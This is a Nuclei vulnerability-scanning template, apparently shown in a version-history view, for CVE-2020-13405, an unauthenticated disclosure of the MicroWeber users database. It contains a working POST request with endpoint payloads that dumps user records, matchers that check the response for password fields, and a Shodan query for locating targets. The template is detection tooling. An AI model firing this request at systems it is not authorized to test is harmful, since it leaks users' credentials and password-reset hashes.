nuclei-templates/cves/2020/CVE-2020-13405.yaml

48 lines
1.5 KiB
YAML
Raw Normal View History

id: CVE-2020-13405
info:
name: MicroWeber - Unauthenticated User Database Disclosure
2022-07-28 12:21:27 +00:00
author: ritikchaddha,amit-jd
severity: high
description: |
The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
reference:
- https://rhinosecuritylabs.com/research/microweber-database-disclosure/
2022-07-28 12:21:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-13405
- https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-13405
cwe-id: CWE-306
2022-07-28 12:21:27 +00:00
metadata:
shodan-query: http.html:"microweber"
verified: "true"
2022-07-28 15:22:10 +00:00
tags: cve,cve2020,microweber,unauth,disclosure
requests:
- raw:
- |
POST /module/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: {{BaseURL}}admin/view:modules/load_module:users
2022-07-28 15:22:10 +00:00
module={{endpoint}}
payloads:
endpoint:
- "users/controller"
- "modules/users/controller"
- "/modules/users/controller"
2022-07-28 10:25:14 +00:00
matchers:
- type: dsl
dsl:
- 'contains(body,"username")'
- 'contains(body,"password")'
- 'contains(body,"password_reset_hash")'
- 'status_code==200'
- 'contains(all_headers,"text/html")'
2022-07-28 10:25:14 +00:00
condition: and